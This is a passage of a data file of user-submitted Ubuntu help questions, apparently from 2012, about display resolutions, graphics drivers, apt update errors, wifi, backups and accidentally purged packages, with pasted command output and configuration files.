`` geforce 9400 gt/pcie/sse2 '' ) 3 ) monitor : samsung syncmaster b2030 4 ) resolutions i am getting : 800x600 1024x768 1152x864 ( i am currently using this one ) 1360x768 ( this one is n't working properly ) does anyone know what i can do ? thanks in advance . update ( 1 ) : today i tried it again . and adding a modeline ( using -- newmode ) worked . but when i used -- addmode by : xrandr -- addmode vga-0 1600x900_60.00 it gave this error : x error of failed request : badmatch ( invalid parameter attributes ) major opcode of failed request : 153 ( randr ) minor opcode of failed request : 18 ( rraddoutputmode ) serial number of failed request : 29 current serial number in output stream : 30
176813	did i make a good choice of computer hardware ?	today i bought a new notebook . configuration : i3 @ 2,1ghz 4gb ram 500gb hd intel hd graphics 3000 it came with windows 7 ; i 'm a ubuntu solid user by 1 year . so , i do n't want to use windows anymore in the machine ( 1 day in windows is enough to make my hair go white ) . will ubuntu run well on this machine ? is this machine good for tasks like web browsing with about 20 tabs open , while watching videos on youtube , and listening to music with rhythmbox ? did i make a good choice ?
176817	changing permissions on a drive owned by root	just installed 12.04 , then formatted an external 2 tb drive for use . my next step would usually been to have logged in as root , changed the permissions to my admin user , then logged back out . . . but as many have bemoaned that ca n't be done anymore . i 'm not very familiar with the terminal and am looking for a new method that is as no muss no fuss as it was under 11 . suggestions ?
176819	persistent file on usb	i 've created a persistent file ( 4gb ) on the usb drive i boot off of . correct me if i 'm wrong but will creating this persistent file , allow changes in the ubuntu environment ? if so , after each reboot , i lose all file changes and applications installed which defeats the purpose of a persistent file . if not , please explain what a persistent file is and what it 's used for ?
176822	ubuntu quantal black screen	i 'm pretty new to ubuntu , just having recently installed it . it was working great , except it would n't shut down properly . i read online that this was due to a video card problem , so i updated my nvidia driver . i then proceded to restart the computer and logged in . the screen had nothing on it besides the background and , after a wee bit , went completely black showing : ubuntu quantal ( development branch ) my computer name tty2 computer name login : i tried logging in multiple times , but to no avail . i 'm not sure what 's going on , but some help would be greatly appreciated .
176823	wacom bamboo splash ( ctl471 ) on 12.04	i recently bought a wacom bamboo splash , and i ca n't get it to work on 12.04 . the output of lsusb is as follows : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 064e : d104 suyin corp . bus 005 device 006 : id 1410:6002 novatel wireless bus 006 device 002 : id 056a:00dd wacom co. , ltd
176825	what version of c++ does 12.04 use ?	if anybody knows or has a way for me to check it would be much appreciated . is n't there a certain version of c++ that you need to use with the gcc ? sorry , i do n't know much about programming , but i noticed that you have to write code differently compared to other operating systems for it to compile .
176837	how do i install mailscanner on 11.10 ?	i 'm attempting to add/install mailscanner to my ubuntu 11.10 desktop configuration running postfix . i tried installing the latest 12.04 lts but it had neither mailscanner nor qpopper package , 11.10 has qpopper so this is the release i went with . i went to the mailscanner web site and reviewed the information here , i then went to http : //mailscanner.info/downloads.html and got the version from here . well i tried to follow the instructions from the first link but the mailscanner package installed a series of configuration files with the suffix of dpkg-new sprinkled throughout the install . running dpkg -c mailscanner_4.79.11-2.2_all.debshows the files but without this suffix . i 'm new to linux and i 've clearly missed something but i 'm not sure what . does anyone know what the best way to get mailscanner installed on 11.10 . i 'm aware that the mailscanner package is available for 10.10 and 10.04 but i 'd like to run a release that 's a bit newer .
176841	how to host an ap or a hotspot ?	i 'm running ubuntu 12.04 as a virtual machine on my mac . since i am unable to get the virtual machine to have full access to my wifi card , i bought another usb wifi card to use . this is my wifi card . if you are unfamiliar with virtual machine , as far as i know , since the ubuntu has its own card now , it should n't matter . i have followed these guides with no luck : https : //help.ubuntu.com/community/wifidocs/wirelessaccesspoint http : //www.danbishop.org/2011/12/11/using-hostapd-to-add-wireless-access-point-capabilities-to-an-ubuntu-server/ the problem is that the wifi connection appears on all of the machines that i have in my house : 2 iphones , dell machine running ubuntu and two macbooks . however the connection times out on all of these machines . questions : could this be a driver issue if that same wifi card can connect to other wifi points and use its internet could this be dhcp related ? i would think not . it should at least get a 169.x.x.x address ? no ? any solutions for me ?
176843	updated 12.04 and now xorg is dead from nvidia drivers	i updated ( august 16 ) ubuntu 12.04 today and while i admit i did n't look what was being updated , it was large enough to have had an nvidia update in it . problem is later on when i turned on my laptop again it wo n't boot into a gui , just to the terminal ( which i do n't really know much of how to do anything ) . now i have been able to log in and type `` startx '' to start up the gui and now its complaining that my nvidia driver ( if i remember correctly ) is listed as being version 304 . ( number ) and the version installed/found is version 295. ( number ) . i do n't know how this happened and now i 'm stuck . i have no idea how it happened and do n't know how to fix . does anyone have any ideas ? i have only access to wifi internet and no idea how to log on without the gui so getting a new nvidia package is n't something i would know how to do even ... any and all help would be highly appreciated . edit : if it helps , i 'm using a asus g series g53jw-a1 http : //www.newegg.com/product/product.aspx ? item=n82e16834220861
176845	how to enable composition for lxde ?	i have had the same problem in xubuntu as documented in '' docky needs composition enabled '' message even after i enabled that , in xubuntu but now i am facing the same issue in lubuntu as well . i ca n't find `` enable display compositing '' in lubuntu though . look at the image for the error message :
176847	installed nvidia driver got blank screen	i 'm having the problem with updating nvidia . after updating the driver , i logged in and got a blank screen . i can change my background , but not much else . i ca n't even get to the terminal to do anything . if i press ctrl+alt+f1 , it sends me to this black screen that asks for my login and password . i 've put in my correct information , but i still ca n't login .
176848	how can i download from 4shared.com via terminal ?	i want to ask if i can download from 4shared.om via terminal ? i tried to use wget http : //dc379.4shared.com/download/cm3oo7ba/applied_radiological_anatomy.pdf ? tsid=20120817-033302-fa3ef03c and wget -- max-redirect=1000 http : //dc379.4shared.com/download/cm3oo7ba/applied_radiological_anatomy.pdf ? tsid=20120817-033302-fa3ef03c and curl http : //dc379.4shared.com/download/cm3oo7ba/applied_radiological_anatomy.pdf ? tsid=20120817-033302-fa3ef03c but none of them do the task . can you help me ?
176849	upgrade ubuntu 11.04 to 12.04 offline ?	apologize if question already exists , i have 5 drives , in 'c ' drive i have installed windows xp pro and in 'h ' drive i have installed ubuntu 11.04 with duel boot between ubuntu 11.04 and windows xp pro , now i want to upgrade ubuntu 11.04 to 12.04 offline i have downloaded ubuntu 12.04 iso image , is there is any way to upgrade without internet and without disturbing my others drivers ? hope i am in right place and i hope i get help .
176853	why does my virtualbox ubuntu server go to a black screen when idle ?	i have a ubuntu server installed system through virtualbox . i am not getting what is the reason that after sometime its turning to black screen . no prompt and nothing i got with this . it 's just black screen . for more clearly its turning to black screen if its in idle for sometime .
176858	which music player has visualizations ?	i thought it was a stupid question , but my preferred player , amarok , does n't have visualizations . rhythmbox also . where can i find a linux player with interesting visualizations ? my 5 years old boy want to hear his cd with the funny things of mommy 's computer .
176871	how do i set resolution to 1440x900 with nvidia ?	i have an nvidia geforce 9800 gt card and suddenly after some recent updates on 12.04 , i am unable to get my resolution higher than 1024x768 . it used to be 1440x900 . i have tried uninstalling and reinstalling the nvidia drivers several times and ways , and still have not found any solution . my current driver version is 295.49 and it says my display is a crt . i do n't understand why it thinks i have a crt . my monitor is a samsung syncmaster 940bw . any help would be greatly appreciated . thanks in advance ! update : i have a second computer that has now done this on the same monitor and it has a different graphics card . the second computer was affected immediately after applying the most recent updates for 12.04 . could this just be a bug in one of the updates ? are others experiencing similar problems with different types of graphics cards ? just a thought . also , on the first computer ( nvidia ) i did a complete reinstall . the best i could get was 1024x768 after installing the nvidia current drivers . i held off on updating the computer to see if i could get a higher resolution but i could n't . then i updated the fresh install with the latest 12.04 updates and now i can only get a resolution of 640x480 . any ideas ? both systems are running 12.04 64 bit . also , after the reinstall i 'm currently running 295.40 version . xrandr output : $ cvt 1440 900 60 # 1440x900 59.89 hz ( cvt 1.30ma ) hsync : 55.93 khz ; pclk : 106.50 mhz modeline `` 1440x900_60.00 '' 106.50 1440 1528 1672 1904 900 903 909 934 -hsync +vsync $ xrandr xrandr : failed to get size of gamma for output default screen 0 : minimum 320 x 240 , current 640 x 480 , maximum 640 x 480 default connected 640x480+0+0 0mm x 0mm 640x480 50.0* 320x240 51.0 $ xrandr -- newmode `` 1440x900_60.00 '' 106.50 1440 1528 1672 1904 900 903 909 934 -hsync +vsync xrandr : failed to get size of gamma for output default $ xrandr xrandr : failed to get size of gamma for output default screen 0 : minimum 320 x 240 , current 640 x 480 , maximum 640 x 480 default connected 640x480+0+0 0mm x 0mm 640x480 50.0* 320x240 51.0 1440x900_60.00 ( 0x177 ) 106.5mhz h : width 1440 start 1528 end 1672 total 1904 skew 0 clock 55.9khz v : height 900 start 903 end 909 total 934 clock 59.9hz $ xrandr -- addmode default 1440x900_60.00 xrandr : failed to get size of gamma for output default $ xrandr -- output default -- mode 1440x900_60.00 xrandr : failed to get size of gamma for output default xrandr : screen can not be larger than 640x480 ( desired size 1440x900 ) xorg.conf : $ cat /etc/x11/xorg.conf # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 295.40 ( buildmeister @ swio-display-x86-rhel47-06.nvidia.com ) thu apr 5 22:40:54 pdt 2012 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection
176873	formatting a 1t storage drive ext4 how much should i leave free to avoid problems ?	while browsing the net about formatting my 1t hard drive as ext4 , i read about people completely filling their drive and being unable to mount . how much can i fill it to safely ? even 95 % wastes 50 gb ! 99 % seems too close as percentage . this is not a system drive just storage .
176874	how can i repair bootable usb drive ?	i have made an usb drive , as live usb . but i am unable to boot from it . it has all required files . assuming i do n't have original iso , how can i attempt to make it bootable again ?
176882	flash video problem ubuntu 12.04	i have looked in multiple other questions and none of them seem to have the right answer for me . i have tried chrome , chromium , and firefox to get flash working and none of them work . i have manually installed and used the one from the software center and neither work . i am at a loss here , i ca n't watch any videos online . the videos plays but then stutters and lags . sometimes it will also go at a 3x speed . im running a lenovo t400 with a intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) graphics card .
176884	how do i backup a server ?	i 'm using ubuntu 12.04 server . i am totally new to ubuntu and i want create a backup of my full operating system and restore it to another system or the same system . could you possibly to explain the step by step process to make a backup and restore it ?
176885	how to recover files after deleted my ubuntu partition ?	i normally dual-boot with 12.04 and win xp pro sp3 on a thinkpad r60 . i needed to reinstall windows because of problems piling up , so i ran the computer 's built-in hard-disk recovery software . i told it not to mess with the other partitions , but somehow it deleted the linux partition . that 's what i was using to backup all of my windows files , so now everything i have is gone . i just ran the usb setup with linux , and the partition is deleted - it just shows it as empty space . is there any way to get all of my files back ?
176886	unity 12.04 black bar below panel	using unity 12.04 i have a black bar , a few pixels wide , appearing below the panel . this over-writes the top of a window which is immediately below the panel . although this may seem a minor problem it is irritating as the bar flashes as it builds up over time and this is extremely irritating . it also does n't fit the theme ( ambience ) and looks bad . if i reveal the launcher and then hide it again , the part of the line covered by the launcher disappears , but it will re-appear again slowly over the new few seconds . this seems to apply to other interface functions such as a mouse click or the appearance of a tool-tip , though in those cases it affects the whole bar . is there any way of removing this behaviour ? .
176888	software updater in ubuntu x64 12.10 bug	i recently installed ubuntu 12.10 daily build . at first everything was ok , but after a few updates , now the software updater always says no internet connection detected . i can update and upgrade through terminal by entering sudo apt-get update and sudo apt-get upgrade but software updater does n't work . it will say `` checking for updates '' for sometime and then will say no internet connection detected . i downloaded synaptic package manager and even in that software when i click on reload , it says the same thing . of course i am still connected to internet when i am trying all this as i can still browse the net . my connection speed is fast as well so that should not be a problem .
176897	how do i toggle the wifi hardware switch for a dell xps 17 l702x ?	every now and then , i disable my wireless via the menu icon in ubuntu . then , when i try to enable the wifi , it tells me that `` wireless is disabled '' or `` wireless is disabled by hardware switch '' . there is a red icon on the f2 key that looks like a wireless icon , and in windows , pressing the ( red ) fn key and f2 toggles the wifi . this does not work in ubuntu , leaving me no clear way to turn wifi back on . how can i restart wifi in ubuntu ?
176900	ca n't open .wmv video files	i installed 12.04 and installed all plug-ins related to video drive . i installed vlc player and tried to start a .wmv file but i get this error : no suitable decoder module : vlc does not support the audio or video format `` mss2 '' . unfortunately there is no way for you to fix this . i followed links of previous .wmv related questions and also searched on google but did not find a solution to the problem . please help me or suggest me any other player .
176902	no catalyst control center	i have installed the amd driver in 12.04 using the additional drivers function . it works fine , fglrxinfo returns correct information , but it seems that there is no catalyst control center , i tried installing fglrx-amdcccle , but still it does not appear when i search installed programs .
176903	simple alternative to ext2fsd ?	i have been using ext2fsd on a few occasions to print ext4 ubuntu files from windows 7 . i found the program to be somewhat unpolished with respect to simplicity , intuitiveness and the user interface . perhaps i 'm just not willing to spend much time looking at it and learning about it . is there a simpler alternative ? edit : the blog for ext2read is pleading for developers so that makes it a little less attractive as an alternative .
176907	installed ubuntu and wine and now windows bsods	quick facts : i installed ubuntu and was following directions on this site to get wine to work ( it was n't working properly ) and changed a few things on my windows partition from within ubuntu . after that , windows started getting bsod . the bsod error says % hs is missing i do n't have a windows license sticker on the bottom of my laptop . i got it through the japanese lenovo site and getting the license from them now is a mess . i 'm running both ubuntu and windows home premium 64-bit in dual-boot . i have looked up many solutions for this % hs thing , and could n't find any that matches my problem . i would just reinstall windows , but i have no disc , and no license . i would love to only use ubuntu , but i have to use excel and this software for my university work . i 'm not sure what to do , but i do n't want to have to buy windows again for $ 70 . please help if you can .
176910	how to make application toolbar show an icon only ?	by default ubuntu displays toolbar icons alongside its text . i want to make every applications toolbar to show icon only . i tried changing this value /desktop/gnome/interface/toolbar_style to icons using gconf-editor like mentioned here and restart ubuntu , but it did n't work .
176911	error in first time boot	i have windows vista 32-bit . i already had ubuntu studio installed with wubi . now i get this error when i select ubuntu : try ( hd0,0 ) : ntfs5 please help me out .
176926	is there a way to prevent alt-tab from raising all windows of an application ?	i have several gvim windows open and one firefox window . using alt-tab to switch to firefox works as expected . using it to go back to gvim does return focus to the gvim window i wanted to write in , but it also raises all other gvim windows ( on the current virtual desktop ) above the firefox window . is there a way to reconfigure window switching so that all irrelevant gvim windows are left alone and i am able to switch between firefox and a selected gvim window only ? i use ubuntu 11.10 on the machine in question .
176933	how can i use cpu-freq indicator ?	translated : i have ubuntu 12.04 and i can not use indicator-cpufreq , does anybody know of any others ? original question me pase a ubuntu 12.04 y ya no puedo usar indicator-cpufreq , conoceis algun otro para que funcione ?
176938	how to resolve fetch error while update packages on ubuntu server	this is same problem which questioned many time on askubuntu , but still there are no perfect answer or not working mostly as i can see : source error , apt-get update fails , update error on apt-get-update err http : //security.ubuntu.com precise-security inrelease err http : //ppa.launchpad.net precise inrelease err http : //us.archive.ubuntu.com precise inrelease err http : //us.archive.ubuntu.com precise-updates inrelease err http : //us.archive.ubuntu.com precise-backports inrelease err http : //security.ubuntu.com precise-security release.gpg temporary failure resolving 'security.ubuntu.com' err http : //ppa.launchpad.net precise release.gpg temporary failure resolving 'ppa.launchpad.net' err http : //us.archive.ubuntu.com precise release.gpg temporary failure resolving 'us.archive.ubuntu.com' err http : //us.archive.ubuntu.com precise-updates release.gpg temporary failure resolving 'us.archive.ubuntu.com' err http : //us.archive.ubuntu.com precise-backports release.gpg temporary failure resolving 'us.archive.ubuntu.com' reading package lists ... done w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/inrelease w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/inrelease w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-backports/inrelease w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/precise-security/inrelease w : failed to fetch http : //ppa.launchpad.net/indicator-multiload/stable-daily/ubuntu/dists/precise/inrelease w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/precise-security/release.gpg temporary failure resolving 'security.ubuntu.com' w : failed to fetch http : //ppa.launchpad.net/indicator-multiload/stable-daily/ubuntu/dists/precise/release.gpg temporary failure resolving 'ppa.launchpad.net' w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/release.gpg temporary failure resolving 'us.archive.ubuntu.com' w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/release.gpg temporary failure resolving 'us.archive.ubuntu.com' w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-backports/release.gpg temporary failure resolving 'us.archive.ubuntu.com' w : some index files failed to download . they have been ignored , or old ones used instead . content of my source.list # deb cdrom : [ ubuntu-server 12.04 lts _precise pangolin_ - release i386 ( 20120424.1 ) ] / precise main restricted # deb cdrom : [ ubuntu-server 12.04 lts _precise pangolin_ - release i386 ( 20120424.1 ) ] / precise main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //us.archive.ubuntu.com/ubuntu/ precise main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ precise main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //us.archive.ubuntu.com/ubuntu/ precise-updates main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //us.archive.ubuntu.com/ubuntu/ precise universe deb-src http : //us.archive.ubuntu.com/ubuntu/ precise universe deb http : //us.archive.ubuntu.com/ubuntu/ precise-updates universe deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //us.archive.ubuntu.com/ubuntu/ precise multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ precise multiverse deb http : //us.archive.ubuntu.com/ubuntu/ precise-updates multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //us.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu precise-security main restricted deb-src http : //security.ubuntu.com/ubuntu precise-security main restricted deb http : //security.ubuntu.com/ubuntu precise-security universe deb-src http : //security.ubuntu.com/ubuntu precise-security universe deb http : //security.ubuntu.com/ubuntu precise-security multiverse deb-src http : //security.ubuntu.com/ubuntu precise-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu precise partner # deb-src http : //archive.canonical.com/ubuntu precise partner # # uncomment the following two lines to add software from ubuntu's # # 'extras ' repository . # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . # deb http : //extras.ubuntu.com/ubuntu precise main # deb-src http : //extras.ubuntu.com/ubuntu precise main after a lot of updates install on ubuntu server , suddenly i face fetch error on ubuntu server . is this a problem of dns fixes ? or what , i also tried google nameserver dns 8.8.8.8 and 8.8.4.4 in resolv.conf . doing some research on google , and conversation on irc linode but did n't get any solution . i am also add some mirros in source.list file but after run update it shows it ignore all mirrors . it is much better for me and everyone if there is much better one time solution of this problem .
176945	system-wide proxy with username/password 12.04 ?	how do i set a system-wide proxy with username/password in ubuntu 12.04 ? i have seen in the 'network ' section of system settings that i can define the proxy , but i ca n't see any menu where to set up the username/password combination for the proxy . any ideas ?
176955	how to create shortcut commands in terminal ?	i am looking for a way to make a shortcut command . for example , i want to execute the command g++-4.7 temp.cpp -o temp by running either g temp.cpp -o temp or g++ temp.cpp -o temp . is there a way to change the application 's name for not having to type the complete name ?
176956	lightdm crashes after logging into my account but works fine for all other accounts	i have ubuntu 12.04 . i installed the kubuntu-desktop package from the software centre and the installation went fine . but after restarting , lightdm kept on crashing when i logged into my account . but when i tried for my mom 's account it worked fine . how do i solve this problem ? could it be a permission problem with the home folder ?
176960	how do you use the commander plugin in gedit ?	this plugin is available from gedit-plugins package . other than what its name and short description are , there are no other helpful info about the plugin usage . does anyone know how to use this plugin ?
176964	permanently removing apache2	it seems a simple apt-get remove apache2 does not completely remove apache2 as i can still see it on one of the processes when running top . how does one remove apache2 completely on his ubuntu server ? it 's not removed indeed : ~ # which apache2 /usr/sbin/apache2 ~ # whereis apache2 apache2 : /usr/sbin/apache2 /etc/apache2 /usr/lib/apache2 /usr/share/apache2 /usr/share/man/man8/apache2.8.gz but when i do apt-get remove apache2 again : # apt-get remove apache2 reading package lists ... done building dependency tree reading state information ... done package apache2 is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded .
176970	how can i remove a mainline kernel and move back to a supported kernel ?	i recently upgraded to kernel 3.4 in my ubuntu 12.04 . after that the computer is not booting up . so i used a previous kernel to boot up . actually i do n't want 3.4 kernel . so how can i remove it and use the previous one itself ?
176971	how do i install a package with aptitude ?	i 've looked at an aptitude tutorial and read the man page , but i just do n't get it . after you launch aptitude , how do you say `` install package foo '' ? or search for all packages with `` foo '' in their name ?
176975	can not use a second monitor	when i plug in my second display and activate it in `` displays '' i get an `` out of range '' error . it says the max desktop size is 1600 by 1600 . does anyone know a fix ? i have an amd/ati mobility chipset , and the propriety drivers .
176978	hud background changed to black and ca n't use wine	i am new to ubuntu . after updating 12.04 , hud background changed to black instead of transparent and ca n't use wine and ccc anymore . then i tried gnome but only the wallpaper appeared and ca n't do anything . i am using asus ati radeon 3450/512mb graphic card . before updating ubuntu , i installed ati driver from amd.com . could it be the graphic card driver problem ? any help ?
176987	just now purged packages by mistake	i purged the following packages by mistake . how do i reinstall them . here are logs . i was trying to remove and purge orca screen reader . start-date : 2012-08-17 07:16:01 commandline : apt-get -- purge remove orca* upgrade : python-ubuntuone-storageprotocol : i386 ( 3.0.0-0ubuntu1 , 3.0.0-0ubuntu1.1 ) , libcamel-1.2-29 : i386 ( 3.2.3-0ubuntu6 , 3.2.3-0ubuntu7 ) , libpulse0 : i386 ( 1.1-0ubuntu15 , 1.1-0ubuntu15.1 ) , python-ubuntuone-client : i386 ( 3.0.0-0ubuntu1 , 3.0.1-0ubuntu1.0.1 ) purge : ubuntuone-client : i386 ( 3.0.0-0ubuntu1 ) , ubuntuone-control-panel : i386 ( 3.0.0-0ubuntu1 ) , gstreamer0.10-alsa : i386 ( 0.10.36-1 ) , libpurple0 : i386 ( 2.10.3-0ubuntu1 ) , liborc-0.4-0 : i386 ( 0.4.16-1ubuntu2 ) , gir1.2-totem-1.0 : i386 ( 3.0.1-0ubuntu21 ) , python-gst0.10 : i386 ( 0.10.22-3 ) , unity-2d : i386 ( 5.10.0-0ubuntu1 ) , libyelp0 : i386 ( 3.4.1-0ubuntu1 ) , gstreamer0.10-x : i386 ( 0.10.36-1 ) , gnome-media : i386 ( 3.4.0-0ubuntu2 ) , metacity : i386 ( 2.34.1-1ubuntu11 ) , bluez-gstreamer : i386 ( 4.98-2ubuntu7 ) , ubuntu-docs : i386 ( 12.04.4 ) , gstreamer0.10-plugins-ugly : i386 ( 0.10.18.3-1ubuntu1 ) , brasero-cdrkit : i386 ( 3.4.1-0ubuntu1 ) , oneconf : i386 ( 0.2.8 ) , libreoffice-calc : i386 ( 3.5.2-2ubuntu1 ) , zenity : i386 ( 3.4.0-0ubuntu2 ) , pulseaudio : i386 ( 1.1-0ubuntu15 ) , libfolks-eds25 : i386 ( 0.6.8-2 ) , gir1.2-ubuntuoneui-3.0 : i386 ( 3.0.0-0ubuntu1 ) , libreoffice-gnome : i386 ( 3.5.2-2ubuntu1 ) , totem-plugins : i386 ( 3.0.1-0ubuntu21 ) , rhythmbox : i386 ( 2.96-0ubuntu4 ) , ubuntu-sso-client : i386 ( 3.0.0-0ubuntu1 ) , gnome-control-center : i386 ( 3.4.1-0ubuntu1 ) , python-ubuntuone-control-panel : i386 ( 3.0.0-0ubuntu1 ) , ubuntu-desktop : i386 ( 1.267 ) , libreoffice-emailmerge : i386 ( 3.5.2-2ubuntu1 ) , libreoffice-core : i386 ( 3.5.2-2ubuntu1 ) , gstreamer0.10-plugins-bad-multiverse : i386 ( 0.10.21-1 ) , libtotem0 : i386 ( 3.0.1-0ubuntu21 ) , libavcodec-extra-53 : i386 ( 0.8.3ubuntu0.12.04.1 ) , ubuntuone-client-gnome : i386 ( 3.0.0-0ubuntu1 ) , gstreamer0.10-plugins-good : i386 ( 0.10.31-1ubuntu1 ) , libavformat53 : i386 ( 0.8.3-0ubuntu0.12.04.1 ) , libreoffice-writer : i386 ( 3.5.2-2ubuntu1 ) , libreoffice-draw : i386 ( 3.5.2-2ubuntu1 ) , unity-scope-musicstores : i386 ( 5.10.0-0ubuntu1 ) , shotwell : i386 ( 0.12.2-0ubuntu2 ) , libdmapsharing-3.0-2 : i386 ( 2.9.14-1 ) , rhythmbox-mozilla : i386 ( 2.96-0ubuntu4 ) , software-center : i386 ( 5.2 ) , libsyncdaemon-1.0-1 : i386 ( 3.0.0-0ubuntu1 ) , libschroedinger-1.0-0 : i386 ( 1.0.11-1 ) , rhythmbox-plugin-zeitgeist : i386 ( 2.96-0ubuntu4 ) , libwebkitgtk-3.0-0 : i386 ( 1.8.0-0ubuntu2 ) , gir1.2-webkit-3.0 : i386 ( 1.8.0-0ubuntu2 ) , ubuntu-sso-client-gtk : i386 ( 3.0.0-0ubuntu1 ) , libreoffice-base-core : i386 ( 3.5.2-2ubuntu1 ) , gnome-orca : i386 ( 3.4.0-0ubuntu2 ) , gstreamer0.10-ffmpeg : i386 ( 0.10.13-1 ) , rhythmbox-plugin-cdrecorder : i386 ( 2.96-0ubuntu4 ) , telepathy-haze : i386 ( 0.6.0-0ubuntu1 ) , libubuntuoneui-3.0-1 : i386 ( 3.0.0-0ubuntu1 ) , librhythmbox-core5 : i386 ( 2.96-0ubuntu4 ) , libreoffice-help-en-us : i386 ( 3.5.2-2ubuntu1 ) , python-uno : i386 ( 3.5.2-2ubuntu1 ) , libreoffice-style-human : i386 ( 3.5.2-2ubuntu1 ) , sessioninstaller : i386 ( 0.20+bzr123-0ubuntu2 ) , pulseaudio-module-bluetooth : i386 ( 1.1-0ubuntu15 ) , libtelepathy-farstream2 : i386 ( 0.4.0-0ubuntu1 ) , gstreamer0.10-pulseaudio : i386 ( 0.10.31-1ubuntu1 ) , pulseaudio-module-x11 : i386 ( 1.1-0ubuntu15 ) , gnome-online-accounts : i386 ( 3.4.0-0ubuntu1 ) , libgoa-1.0-0 : i386 ( 3.4.0-0ubuntu1 ) , gnome-user-guide : i386 ( 3.4.1-1 ) , apturl : i386 ( 0.5.1ubuntu3 ) , libreoffice-impress : i386 ( 3.5.2-2ubuntu1 ) , indicator-datetime : i386 ( 0.3.94-0ubuntu2 ) , nautilus-share : i386 ( 0.7.3-1ubuntu2 ) , gstreamer0.10-plugins-bad : i386 ( 0.10.22.3-2ubuntu2 ) , evolution-data-server : i386 ( 3.2.3-0ubuntu6 ) , rhythmbox-plugins : i386 ( 2.96-0ubuntu4 ) , libgstreamer-plugins-bad0.10-0 : i386 ( 0.10.22.3-2ubuntu2 ) , python-ubuntu-sso-client : i386 ( 3.0.0-0ubuntu1 ) , gimp : i386 ( 2.6.12-1ubuntu1 ) , libbrasero-media3-1 : i386 ( 3.4.1-0ubuntu1 ) , rhythmbox-ubuntuone : i386 ( 3.0.0-0ubuntu1 ) , yelp : i386 ( 3.4.1-0ubuntu1 ) , gir1.2-rb-3.0 : i386 ( 2.96-0ubuntu4 ) , libreoffice-math : i386 ( 3.5.2-2ubuntu1 ) , pulseaudio-module-gconf : i386 ( 1.1-0ubuntu15 ) , indicator-sound : i386 ( 0.8.5.0-0ubuntu2 ) , libcanberra-pulse : i386 ( 0.28-3ubuntu3 ) , libmjpegtools-1.9 : i386 ( 1.9.0-0.5ubuntu7 ) , brasero : i386 ( 3.4.1-0ubuntu1 ) , libreoffice-common : i386 ( 3.5.2-2ubuntu1 ) , libwebkitgtk-1.0-0 : i386 ( 1.8.0-0ubuntu2 ) , libquicktime2 : i386 ( 1.2.3-4build2 ) , totem : i386 ( 3.0.1-0ubuntu21 ) , gstreamer0.10-plugins-base : i386 ( 0.10.36-1 ) , indicator-power : i386 ( 2.0-0ubuntu1 ) , libgstreamer-plugins-base0.10-0 : i386 ( 0.10.36-1 ) , libfarstream-0.1-0 : i386 ( 0.1.2-0ubuntu1 ) , totem-mozilla : i386 ( 3.0.1-0ubuntu21 ) , libreoffice-style-tango : i386 ( 3.5.2-2ubuntu1 ) , libreoffice-gtk : i386 ( 3.5.2-2ubuntu1 ) , rhythmbox-plugin-magnatune : i386 ( 2.96-0ubuntu4 )
